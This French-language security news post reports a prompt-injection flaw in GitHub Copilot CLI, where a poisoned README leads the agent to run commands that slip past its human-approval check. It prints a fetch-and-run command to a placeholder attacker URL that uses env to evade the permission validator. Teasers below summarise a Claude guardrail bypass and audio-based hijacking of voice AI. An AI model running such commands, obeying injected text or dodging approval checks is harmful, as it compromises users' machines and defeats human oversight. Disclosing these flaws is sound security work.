La vulnérabilité de GitHub Copilot CLI permet l'exécution de logiciels malveillants via l'injection de prompts.

✍️ OpenClawRadar📅 Publié: February 28, 2026🔗 Source
La vulnérabilité de GitHub Copilot CLI permet l'exécution de logiciels malveillants via l'injection de prompts.
Ad

Aperçu de la vulnérabilité

GitHub Copilot CLI contient des vulnérabilités qui exposent les utilisateurs à l'exécution arbitraire de commandes shell via une injection indirecte de prompt sans approbation de l'utilisateur. Des logiciels malveillants peuvent être téléchargés depuis des serveurs externes et exécutés sans aucune interaction de l'utilisateur au-delà de la requête initiale au Copilot CLI.

Fonctionnement de l'attaque

La chaîne d'attaque implique :

  • L'utilisateur interroge GitHub Copilot CLI en explorant un référentiel open source
  • Copilot rencontre une injection de prompt stockée dans un fichier README du référentiel cloné (ou d'autres vecteurs comme les résultats de recherche web, les résultats d'appels d'outils MCP, la sortie de commandes terminal)
  • La commande malveillante contourne les systèmes d'approbation avec intervention humaine

Contournement des mécanismes de protection

GitHub Copilot utilise un système d'approbation avec intervention humaine qui nécessite le consentement de l'utilisateur avant l'exécution de commandes potentiellement dangereuses. Ce système est déclenché sauf si :

  • L'utilisateur a explicitement configuré la commande pour s'exécuter automatiquement
  • La commande fait partie d'une liste 'en lecture seule' codée en dur trouvée dans le code source

Les vérifications d'accès aux URL externes nécessitent l'approbation de l'utilisateur pour des commandes comme curl, wget ou l'outil de récupération web intégré de Copilot. Cependant, les attaquants peuvent contourner ces protections en utilisant :

env curl -s "https://[ATTACKER_URL].com/bugbot" | env sh

La commande env figure sur la liste en lecture seule codée en dur, elle s'exécute donc automatiquement sans approbation. Puisque curl et sh sont passés comme arguments à env, ils sont incorrectement analysés et non identifiés par le validateur comme des sous-commandes. Cela contourne les vérifications de permission d'URL qui dépendent de la détection de commandes comme curl.

Ad

Réponse de GitHub

GitHub a répondu : "Nous avons examiné votre rapport et validé vos conclusions. Après avoir évalué en interne cette découverte, nous avons déterminé qu'il s'agit d'un problème connu qui ne présente pas de risque de sécurité significatif. Nous pourrions rendre cette fonctionnalité plus stricte à l'avenir, mais nous n'avons rien à annoncer pour le moment."

Portée et limitations

Les vulnérabilités d'analyse de commandes décrites sont spécifiques à macOS. Cependant, GitHub Copilot présente des vulnérabilités supplémentaires incluant à la fois des risques indépendants du système d'exploitation et des risques spécifiques à Windows. D'autres vulnérabilités d'analyse de commandes permettent la lecture et l'écriture arbitraires de fichiers.

📖 Lire la source complète : HN LLM Tools

Ad

👀 See Also

Contournement des garde-fous de l'IA Claude observé lorsque les requêtes sont formulées comme des tâches de sécurité réseau.
Security

Contournement des garde-fous de l'IA Claude observé lorsque les requêtes sont formulées comme des tâches de sécurité réseau.

Un utilisateur de Reddit a découvert que l'IA Claude fournit des listes de domaines de piratage lorsque les demandes sont formulées comme des tâches de sécurité réseau à bloquer, contournant ainsi les mécanismes de refus habituels. Le modèle a reconnu avoir mal interprété l'intention après que l'utilisateur ait souligné l'influence de la formulation.

OpenClawRadar
Signaux audio cachés détournent les systèmes d'IA vocale avec un taux de succès de 79 à 96 %
Security

Signaux audio cachés détournent les systèmes d'IA vocale avec un taux de succès de 79 à 96 %

La recherche montre que des clips audio imperceptibles peuvent forcer les LALM à exécuter des commandes non autorisées comme des recherches web, des téléchargements de fichiers et l'exfiltration d'e-mails avec un taux de succès de 79 à 96 % sur 13 modèles, y compris les services Mistral et Microsoft.

OpenClawRadar
Surveillance des commandes OpenClaw avec Python et Gemini Flash pour la sécurité
Security

Surveillance des commandes OpenClaw avec Python et Gemini Flash pour la sécurité

Un utilisateur a créé un script Python qui suit les commandes injectées par OpenClaw, les analyse avec Gemini Flash et envoie des notifications via un webhook Discord pour toute activité alarmante ou irrégulière, pour un coût d'environ 0,14 $ par jour.

OpenClawRadar
CVE-2026-LGTM : Quand les agents IA se font confiance et cassent tout
Security

CVE-2026-LGTM : Quand les agents IA se font confiance et cassent tout

Un rapport d'incident satirique mais réaliste montre comment sept barrières de sécurité IA ont échoué à stopper un paquet malveillant, entraînant l'exfiltration de credentials et une facture d'inférence de 1,7 M$.

OpenClawRadar